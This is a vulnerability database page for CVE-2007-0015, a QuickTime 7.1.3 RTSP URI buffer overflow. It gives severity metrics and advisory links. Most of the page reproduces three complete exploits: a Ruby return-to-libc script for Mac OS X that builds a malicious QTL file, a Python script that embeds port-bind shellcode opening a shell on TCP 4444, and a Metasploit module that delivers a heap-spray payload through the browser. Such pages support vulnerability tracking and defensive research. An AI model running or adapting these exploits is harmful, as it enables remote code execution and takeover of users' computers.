CVE-2007-0015 : Details

CVE-2007-0015

89.61% V3
Network
2007-01-01 22h00 +00:00
2017-10-18 12h57 +00:00

CVE Description

Buffer overflow in Apple QuickTime 7.1.3 allows remote attackers to execute arbitrary code via a long rtsp:// URI.

CVE Information

Metrics

Metric | Score | Severity | CVSS Vector | Source
V2 | 6.8 | - | AV:N/AC:M/Au:N/C:P/I:P/A:P | nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore serves to compare a CVE's EPSS score against those of other CVEs.

Exploit Information

Exploit Database EDB-ID: 3064

Publication date: 2006-12-31 23h00 +00:00
Author: MoAB
EDB Verified: Yes

#!/usr/bin/ruby
# Copyright (c) LMH <lmh [at] info-pull.com>
#               Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Notes:
# Our command string is loaded on memory at a static address normally,
# but this depends on execution method and the string length. The address set in this exploit will
# be likely successful if we open the resulting QTL file directly, without having an
# instance of Quicktime running. Although, when using another method and string, you'll need
# to find the address.
# For 100% reliable exploitation you can always use the /bin/sh address,
# but that's not as cool as having your box welcoming the new year.
# Do whatever you prefer. That said, enjoy.
#
# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html

# Command string: Use whatever you like.
# Remember that changing this will also need a change of the target address for system(),
# unless string length is the same.
CMD_STRING = "/usr/bin/say Happy new year shit bag"

# Mac OS X 10.4.8 (8L2127)
EBP_ADDR    = 0xdeadbabe
SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back
SETUID_ADDR = 0x900334f0
CURL_ADDR   = 0x916c24bc # /usr/bin/curl
SHELL_ADDR  = 0x918bef3a # /bin/sh

CMDSTR_ADDR = [
  SHELL_ADDR, # 0 addr to static /bin/sh (lame)
  0x17a053c,  # 1 addr to our command string (cool) :> (change as necessary)
  0xbabeface, # 2 bogus addr for testing.
  CURL_ADDR   # 3 addr to '/usr/bin/curl'
]

# Payload
HAPPY = ("A" * 299) +
        [EBP_ADDR].pack("V") +
        [SYSTEM_ADDR].pack("V") +
        [SETUID_ADDR].pack("V") +
        [CMDSTR_ADDR[1]].pack("V") # change array index for using diff. addr

# Sleds: not necessary if using /bin/bash addr or other built-in addresses.
# although, for using our own fu, we need to spray some data for better reliability
# the goal is causing allocation of large heap chunks
NEW   = ("\x90" * 30000) + CMD_STRING # feed the heap
YEAR  = ("\x90" * 30000) + CMD_STRING # go johnny, go
APPLE = ("\x90" * 30000) + "EOOM"     # feed the heap more
BOYZ  = ("\x90" * 30000) + "FOOM"     # and more

# QTL output template
QTL_CONTENT = "<?xml version=\"1.0\"?>" +
              "<?quicktime type=\"application/x-quicktime-media-link\"?>" +
              "<embed autoplay=\"true\" moviename=\"#{NEW}\" " +
              "qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " +
              "src=\"rtsp://#{BOYZ}:#{HAPPY}\" />\n"

target_file = File.open("pwnage.qtl", "w+") { |f|
  f.print(QTL_CONTENT)
  f.close
}

# milw0rm.com [2007-01-01]
Exploit Database EDB-ID: 3072

Publication date: 2007-01-02 23h00 +00:00
Author: Winny Thomas
EDB Verified: Yes

#!/usr/bin/python
#Port bind exploit for apple quicktime rtsp vulnerability
#Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy
#to port the exploit to others. All one needs to do is look for the appropriate
#jump address. Certain characters are not permitted in the shellcode.
#Alphanumeric shellcodes work fine.
#This script creates a qtl file which when clicked upon binds a shell to TCP
#port 4444. This file can be delivered through several means; HTTP, SMTP etc
#
# Winny Thomas ;-)
# Author shall bear no responsibility for any kind of screws up caused by using
# this code

import sys

#alpha numeric port bind shellcode from metasploit; binds shell to port 4444
shellcode  = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57"
shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38"
shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58"
shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48"
shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54"
shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d"
shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38"
shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56"
shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57"
shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e"
shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30"
shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34"
shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41"
shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a"
shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d"
shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56"
shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46"
shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c"
shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c"
shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32"
shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36"
shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56"
shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
shellcode += "\x4f\x4f\x42\x4d\x5a\x90"
shellcode += "\x90" * 90

def CreateQTL(sp):
    if sp == "1":
        JMPedi = '\xf5\x0c\xe5\x77' #Address of jmp edi from user32.dll
    elif sp == "2":
        JMPedi = '\x34\xd9\xe4\x77' #Address of jmp edi from user32.dll
    else:
        print 'Unsupported Service pack number'
        sys.exit(-1)

    #XML template from http://www.milw0rm.org/exploits/3064
    QTL  = "<?xml version=\"1.0\"?>"
    QTL += "<?quicktime type=\"application/x-quicktime-media-link\"?>"
    QTL += "<embed autoplay=\"true\" moviename=\"#{NEW}\" "
    QTL += "qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" "
    QTL += "src=\"rtsp://" + '\x90'*200 + shellcode + '\x90'*9000 + ':' + '\x90'*811 + JMPedi
    QTL += "\" />\n"

    fd = open('./exp.qtl', 'w')
    fd.write(QTL)
    fd.close()

if __name__ == '__main__':
    try:
        sp = sys.argv[1]
    except IndexError:
        print 'Usage: %s <version number>\n' % sys.argv[0]
        print 'Version: 1 => windows 2000 server SP0'
        print 'Version: 2 => windows 2000 server SP4'
        sys.exit(-1)
    CreateQTL(sp)

# milw0rm.com [2007-01-03]
Exploit Database EDB-ID: 16527

Publication date: 2010-05-03 22h00 +00:00
Author: Metasploit
EDB Verified: Yes

##
# $Id: apple_quicktime_rtsp.rb 9220 2010-05-04 23:09:32Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:os_name    => OperatingSystems::WINDOWS,
		:javascript => true,
		:rank       => NormalRanking, # reliable memory corruption
		:vuln_test  => nil,
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in Apple QuickTime
				7.1.3. This module was inspired by MOAB-01-01-2007. The Browser
				target for this module was tested against IE 6 and Firefox 1.5.0.3
				on Windows XP SP0/2; Firefox 3 blacklists the QuickTime plugin.
			},
			'Author'         => [ 'MC', 'egypt' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9220 $',
			'References'     =>
				[
					[ 'CVE', '2007-0015' ],
					[ 'OSVDB', '31023'],
					[ 'BID', '21829' ],
					[ 'URL', 'http://projects.info-pull.com/moab/MOAB-01-01-2007.html' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
					[ 'Apple QuickTime Player 7.1.3',
						{
							'Ret' => 0x6855d8a2 # xpsp2/2k3 :( | vista ;)
						}
					],
					[ 'Browser Universal',
						{
							'Ret' => 0x0c0c0c0c # tested on xpsp0 and sp2
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jan 1 2007',
			'DefaultTarget'  => 0))
	end

	def on_request_uri(client, request)
		return if ((p = regenerate_payload(client)) == nil)

		if (target.name =~ /Automatic/)
			if (request['User-Agent'] =~ /QuickTime/i)
				target = targets[1]
			else
				target = targets[2]
			end
		end

		cruft = rand_text_alphanumeric(4)

		# This is all basically filler on the browser target because we can't
		# expect the SEH to be in a reliable place across multiple browsers.
		# Heap spray ftw.
		sploit = rand_text_english(307)
		sploit << p.encoded + "\xeb\x06" + rand_text_english(2)
		sploit << [target.ret].pack('V') + [0xe8, -485].pack('CV')

		if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.qtl$/)
			print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...")
			print_status("Trying target #{target.name}...")
			content = build_qtl(sploit)
		else
			print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...")

			shellcode = Rex::Text.to_unescape(p.encoded)
			url = ((datastore['SSL']) ? "https://" : "http://")
			url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
			url << ":" + datastore['SRVPORT']
			url << get_resource

			js = <<-ENDJS
				#{js_heap_spray}
				sprayHeap(unescape("#{shellcode}"), 0x#{target.ret.to_s 16}, 0x4000);
			ENDJS
			content = "<html><body><script><!--\n#{js}//--></script>"
			content << <<-ENDEMBED
			<OBJECT CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" WIDTH="1" HEIGHT="1" CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
				<PARAM name="SRC" VALUE = "#{url}/#{cruft}.qtl">
				<PARAM name="QTSRC" VALUE = "#{url}/#{cruft}.qtl">
				<PARAM name="AUTOPLAY" VALUE = "true" >
				<PARAM name="TYPE" VALUE = "video/quicktime" >
				<PARAM name="TARGET" VALUE = "myself" >
				<EMBED SRC = "#{url}/#{cruft}.qtl" QTSRC = "#{url}/#{cruft}.qtl" TARGET = "myself" WIDTH = "1" HEIGHT = "1" AUTOPLAY = "true" PLUGIN = "quicktimeplugin" TYPE = "video/quicktime" CACHE = "false" PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
				</EMBED>
			</OBJECT>
			ENDEMBED
			content << "</body></html>"
		end

		send_response(client, content, { 'Content-Type' => "text/html" })

		# Handle the payload
		handler(client)
	end

	def build_qtl(overflow)
		cruft = rand_text_english(4)
		content = "<?xml version=\"1.0\"?>\n"
		content << "<?quicktime type=\"application/x-quicktime-media-link\"?>\n"
		content << "<embed autoplay=\"true\" \n"
		content << "moviename=\"#{cruft}\" \n"
		content << "qtnext=\"#{cruft}\" \n"
		content << "type=\"video/quicktime\" \n"
		content << "src=\"rtsp://#{cruft}:#{overflow}\" />\n"
	end

end

Products Mentioned

Configuration 0

Apple >> Quicktime >> Version 7.1.3

References

http://www.kb.cert.org/vuls/id/442497
Tags: third-party-advisory, x_refsource_CERT-VN
http://www.osvdb.org/31023
Tags: vdb-entry, x_refsource_OSVDB
http://www.us-cert.gov/cas/techalerts/TA07-005A.html
Tags: third-party-advisory, x_refsource_CERT
http://secunia.com/blog/7/
Tags: x_refsource_MISC
http://secunia.com/advisories/23540
Tags: third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/21829
Tags: vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/3064
Tags: exploit, x_refsource_EXPLOIT-DB
http://www.vupen.com/english/advisories/2007/0001
Tags: vdb-entry, x_refsource_VUPEN
http://securitytracker.com/id?1017461
Tags: vdb-entry, x_refsource_SECTRACK